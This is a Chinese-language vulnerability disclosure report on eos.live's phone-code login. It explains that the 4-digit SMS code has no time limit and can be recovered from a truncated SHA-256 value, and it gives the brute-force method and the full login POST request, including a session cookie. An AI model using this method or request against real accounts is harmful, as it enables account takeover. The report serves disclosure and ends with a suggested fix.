漏洞URL:https://eos.live/
简要描述:验证码4位数没时间限制 sha256加密截取的4个字符 脚本加密截取即可
漏洞证明:
https://eos.live/
手机验证码登录4位数
这里验证码是加密的 0000是 b336
看了js是sha256加密 截取字符串第五位数开始截取4个字符
解密0000正好是b336
写个脚本循环0000-9999 然后sha256加密 再截取第五位数开始截取4个
php脚本
把加密截取出来的4个字符导入文本去爆破 成功登录
漏洞利用代码:
POST /v1/user/login HTTP/1.1
Host: eos.live
Connection: close
Content-Length: 114
Accept: application/json, text/plain, */*
Origin: https://eos.live
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://eos.live/user/saozhu
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.1334098644.1535605506; _gid=GA1.2.1939758515.1535605506; connect.sid=s%3A2UBa2wYv9kPj9axP584NX4NCx1rT9Ha3.VD0FMlk85%2BkFrGxQBn9S5Miu55ogO86sabYBpmYYJZM
{"username":"","mobile":"+86130xxxxxxxx","smscode":"3543","ucode":"3582201127","captchatext":"f397","password":""}
修复方案:
6位数验证码时间限制